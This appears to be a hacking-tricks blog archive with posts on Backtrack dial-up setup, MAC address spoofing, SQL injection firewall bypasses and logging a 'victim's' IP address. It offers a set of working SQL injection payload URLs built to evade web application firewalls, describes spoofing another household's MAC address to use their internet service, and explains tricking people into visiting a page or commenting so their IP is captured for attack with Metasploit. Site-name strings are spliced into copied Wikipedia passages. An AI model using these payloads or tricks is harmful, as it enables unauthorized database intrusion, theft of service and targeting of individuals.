Category Archives: Tricks

How To Make PPPoE Or dial Up Connection in Backtrack

~
How To Make PPPoE Or Dial-Up Connection in Backtrack
How To Setup Dial up in Backtrack ?
How To Connect To Internet Using Dial Up Connection In Backtrack ?

well i dont want to make this tutorial “long” :v so get your hands ready..

1st of all i am making dial up connection in Backtrack 5r3 using Vmware Player

what you have to do is , download backtrack 5r3 or you can use any (i think :S)
download vmware player
now run Backtrack but ! Network Mode => Bridged ~
Network Mode Must Be => Bridged ~

You have to change mac address in Backtrack , use mac address of windows 
CMD => ipconfig =>
 Physical Address is your Mac Address write it down anywhere

for Changing Mac Address In Backtrack Read This Tutorial ~

After changing your Mac address you can “continue” 😀

open terminal than type

pppoeconf

Screen will pop Press/Click on yes 
Than enter your username
Enter your password
yes yes yes yes yes yes and yes , yes !
now you have successfully connected to internet..
open terminal type ping google.com and vOiLa! 

continue 😛 thank you for reading \m/

How to change Mac Address in Backtrack ?

~

How to change Mac Address in Backtrack ?

well changing mac address in Backtrack is pretty easy…

What Is Mac Address ?

media access control address (MAC address) is a unique identifier assigned to network interfaces for communications on the physical network segment. MAC addresses are used as a network address for most IEEE 802 network technologies, including Ethernet. Logically, MAC addresses are used in themedia access control protocol sublayer of the OSI reference model.

MAC addresses are most often assigned by the manufacturer of a network interface controller (NIC) and are stored in its hardware, such as the card’s read-only memory or some other firmware mechanism. If assigned by the manufacturer, a MAC address usually encodes the manufacturer’s registered identification number and may be referred to as the burned-in address (BIA). It may also be known as an Ethernet hardware address (EHA), hardware address or physical address. This can be contrasted to a programmed address, where the host device issues commands to the NIC to use an arbitrary address. An example is a SOHO router, for which the ISP grants access to only one MAC address (used previously to inserting the router) so the router must use that MAC address on its Internet-facing NIC. Therefore the router administrator configures a MAC address to override the burned-in one.
A network node may have multiple NICs and each must have one unique MAC address per NIC.
MAC addresses are formed according to the rules of one of three numbering name spaces managed by the Institute of Electrical and Electronics Engineers(IEEE): MAC-48, EUI-48, and EUI-64. The IEEE claims trademarks on the names EUI-48 and EUI-64, in which EUI is an abbreviation for Extended Unique Identifier.-WikiPedia~

Now Let Me Tell Youh , How To Change Mac Address In Backtrack..
1. Open ConsoLe than type ifconfig eth0 down
2. Now type , macchanger -r eth0 
3. ifconfig eth0 up
1 Command – it will disable eth0 
2 Command – it will generate random Mac Address
3 Command – it will enable the eth0 😀

Change Mac Address To Whatever You Want-
Change Mac Address Of your Choice-
Open Terminal and type – 
1. ifconfig eth0 down
2.type in terminal  macchanger –mac your MAc address with : : : example 11:22:33:44:55 eth0
                             machchanger –mac 11:22:33:44:55 eth0
3. ifconfig eth0 up

Pretty easy han ? you can msg me if you have any problem 🙂

MAC Address – Change MAC Address Of Your Choice

~
media access control address (MAC address) is a unique identifier assigned to network interfaces for communications on the physical network segment. MAC addresses are used as a network address for most IEEE 802 network technologies, including Ethernet. Logically, MAC addresses are used in the media access control protocol sublayer of the OSI reference model.
MAC addresses are most often assigned by the manufacturer of a network interface controller (NIC) and are stored in its hardware, such as the card’s read-only memory or some other firmware mechanism. If assigned by the manufacturer, a MAC address usually encodes the manufacturer’s registered identification number and may be referred to as the burned-in address (BIA). It may also be known as an Ethernet hardware address (EHA), hardware address or physical address. This can be contrasted to a programmed address, where the host device kidsec.com issues commands to the NIC to use an arbitrary address. An example is a SOHO router, for which the ISP grants access to only one MAC address (used previously to inserting the router) so the router must use that MAC address on its Internet-facing NIC. Therefore the router administrator configures a MAC address to override the burned-in one.
A network node may have multiple NICs and each must have one unique MAC address per NIC.
MAC addresses are formed according to the rules of one of three numbering name spaces managed by the Institute of Electrical and Electronics Engineers(IEEE): MAC-48, EUI-48, and EUI-64. The IEEE claims trademarks on the names EUI-48 and EUI-64, in which EUI is an abbreviation for Extended Unique Identifier. -WikiPedia~

~MAC Address Change Without Any Tool 😀

Ok so in this tutorial i’ll show you how to change mac address in windows without using any tool..
reason of making this tutorial is , i wanted to use my brothers Internet’s Connection in my PC.. but my Internet Service kidsec.com Provider is just >.<  hope you got it 😀 than i changed the MAC address of my PC..
To change the Mac Address Goto Control Panel => Network Connections => Local Area Connection (Any , Which You Are Using) right click on it and Click on Properties,
Connect Using (your adapter) kidsec.com Click on Configure than click on Advance Tab and in The Properties Tab ,
Look for Locally Administered Address Or MAC Address than Click on it and enter the MAC Address Of Your Choice 😀


Note:- MAC Address must be entered without dashes – i wanted to use my brother’s internet connection so i entered his own MAC Address pffff 😀 and net is working awesome with 200 kbps download speed x)

Note:- For Educational Purpose Only ~

Advance WAF ByPassing Techiques

~

How To Bypass Forbidden Error SQL Injection

Today I am going to show you how to bypass Web Application Firewalls (WAF).

Let’s Begin!

How to know if there is a Web Application Firewall?

This is pretty simple! When you try to enter a command used for SQL Injections (usually the “UNION SELECT” command), you get an 403 Error (and the website says “Forbidden” or “Not Acceptable”).

Example:

Code:
http://www.site.com/index.php?page_id=-15 UNION SELECT 1,2,3,4....
(We get a 403 Error!)


Basic/Simple Methods:

First, of course, we need to know the Basic Methods to bypass WAF…

1) Comments:
You can use comments to bypass WAF:

Code:

Code:
http://www.site.com/index.php?page_id=-15 /*!UNION*/ /*!SELECT*/ 1,2,3,4....
(First Method that can Bypass WAF)


However, most WAF identify this method so they still show a “Forbidden” Error…

2) Change the Case of the Letters:
You can also change the Case of the Command:

Code:

Code:
http://www.site.com/index.php?page_id=-15 uNIoN sELecT 1,2,3,4....
(Another Basic Method to Bypass WAF!)


However, as before, this trick is also detected by most WAF!

3) Combine the previous Methods:

What you can also do is to combine the previous two methods:

Code:

Code:
http://www.site.com/index.php?page_id=-15 /*!uNIOn*/ /*!SelECt*/ 1,2,3,4....
This method is not detectable by many Web Application Firewalls!

4) Replaced Keywords:

Some Firewalls remove the “UNION SELECT” Statement when it is found in the URL… We can do this to exploit this function:

Code:

Code:
http://www.site.com/index.php?page_id=-15 UNIunionON SELselectECT 1,2,3,4....
(The "union" and the "select" will be removed, so the final result will be: "UNION SELECT" 😀 )
This method doesn’t work on ALL Firewalls, as only some of them remove the “UNION” and the “SELECT” commands when they are detected!

5) Inline Comments (Thanks to Crysan):
Some firewalls get bypassed by Inserting Inline Comments between the “Union” and the “Select” Commands:
Code:

Code:
http://www.site.com/index.php?page_id=-15 UnION/**/SElecT 1,2,3,4...
(The U is equal to "U" and S to "S". See more on the Advanced Section....)

I believe that these are the most basic Methods to WAF Bypassing! Let’s move on more advanced ones…

Advanced Methods:

Now that you have learned about Basic WAF Bypassing, I think it is good to understand more advanced Methods!

1) Buffer Overflow / Firewall Crash:
Many Firewalls are developed in C/C++ and we can Crash them using Buffer Overflow!

Code:

Code:
http://www.site.com/index.php?page_id=-15+and+(select 1)=(Select 0xAA[..(add about 1000 "A")..])+/*!uNIOn*/+/*!SeLECt*/+1,2,3,4....

(( You can test if the WAF can be crashed by typing:
?page_id=null
/**//*!50000UnIOn*//*yoyu*/all/**/
/*!SeLEct*/
/*nnaa*/+1,2,3,4....


If you get a 500, you can exploit it using the Buffer Overflow Method! :: Thanks Crysan for the Test))

2) Replace Characters with their HEX Values (Thanks to Crysan!):
We can replace some characters with their HEX (URL-Encoded) Values.

Example:
Code:

Code:
http://www.site.com/index.php?page_id=-15 /*!union*/ /*!select*/ 1,2,3,4....
(which means "union select")
Text to Hex Encoder (Choose the “Hex Encoded for URL” result!): http://www.swingnote.com/tools/texttohex.php

3) Use other Variables or Commands instead of the common ones for SQLi:
Apart from the “UNION SELECT” other commands might be blocked.
Common Commands Blocked:Code:

Code:
COMMAND | WHAT TO USE INSTEAD

@@version | version()
concat() | concat_ws() --> Difference between concat() and concat_ws(): http://is.gd/VEeiDU
group_concat() | concat_ws()


[!]-> You can also try to SQL Inject with the NAME_CONST Method: http://is.gd/o10i0d (Created by Downfall)
Learning MySQL Really helps on such issues! 😉

4) Misc Exploitable Functions:
Many firewalls try to offer more Protection by adding Prototype or Strange Functions! (Which, of course, we can exploit!):
Example:
The firewall below replaces “*” (asterisks) with Whitespaces! What we can do is this:

Code:

Code:
http://www.site.com/index.php?page_id=-15+uni*on+sel*ect+1,2,3,4...
(If the Firewall removes the "*", the result will be: 15+union+select....)



So, if you find such a silly function, you can exploit it, in this way! 😀

[+] In addition to the previous example, some other bypasses might be:

Code:
-15+(uNioN)+(sElECt)....

-15+(uNioN+SeleCT)+...

-15+(UnI)(oN)+(SeL)(ecT)+....

-15+union (select 1,2,3,4...)

tut Is not Written By Me , Every Credits Goes To Author ~
Kidsec.com

How To Get Someone’s IP Address Easily [New Way]

~
How To Get the I.P Address Of Your Victim ?
Welcome Guys , In This Post I’ll Tell You 
 Extremely Easy Way To Get Someone’s I.P Address 😀
Let Me First Explain 
What Is I.P Address
Source : WikiPedia
An Internet Protocol address (IP address) is a numerical label assigned to each device (e.g., computer, printer) participating in a computer network that uses the Internet Protocol for communication. An IP address serves two principal functions: host or network interface identification and location addressing. Its role has been characterized as follows: “A name indicates what we seek. An address indicates where it is. A route indicates how to get there.
What Is your IP Address ?
 To Find It Just Simply Type In GooGle
ip address
Ok Lets Start ;D
r00t@T4p10N:~# Requirements~
1- Victim
2- Wapka.mobi Account
To Find Someone’s I.P Address Just Simply create account on wapka.mobi
Wapka.mobi is a free hosting website it gives you 4mb of storage.
after creating your website , your website will look like 
username.wapka.mobi
just send it to any one when he/she clicks on your website his/her IP Address will be logged 😀
.You can get the Logged IP Address from Admin Panel of Your Website …
Admin Panel => Stats => Daily ;D
Enjoy ;D
Zaid Sparrow
Kidsec.com 

How To Get Someone’s I.P Through Blogger ?

~

How To Get Someone’s IP Address Through Blogger ?

How To Find Someone’s IP Address using Blogger ?
How To Find Someone’s IP Address Via Blogger ? huh..
Problem Is Solved Now 😀 xP 😛

In this post i’ll tell you how to get someones IP address easily 😀

root@T4p10N:~# Requirements :~
Blogger
Disqus Comments 
Victim ;D

Ok Lets Start 😉

First of all install Disqus Comments in Blogger and set its settings as normal..
but set Comment Moderation => YES Or Always it means whenever someone comment on your blog than the comment must be approved by Admin or Moderator…
 make a Good Post on Blogger and tell your Victim to Comment on the Post..
When He/She will comment on the Blog Post you’ll be notified by email..
Something Like This ~

Now you have the IP of your Damn Victim 😀 
umm what will you do now ? FOREVER ALONE 😀
well you can attack him/her by using Metasploit DB_AUTOPWN 😀

In My Up-Coming Post , I’ll Tell You Easy And Fantastic Way To Get Someone’s IP Address 😀 xP

Written By Zaid Sparrow
Thank You 😉
Kidsec.com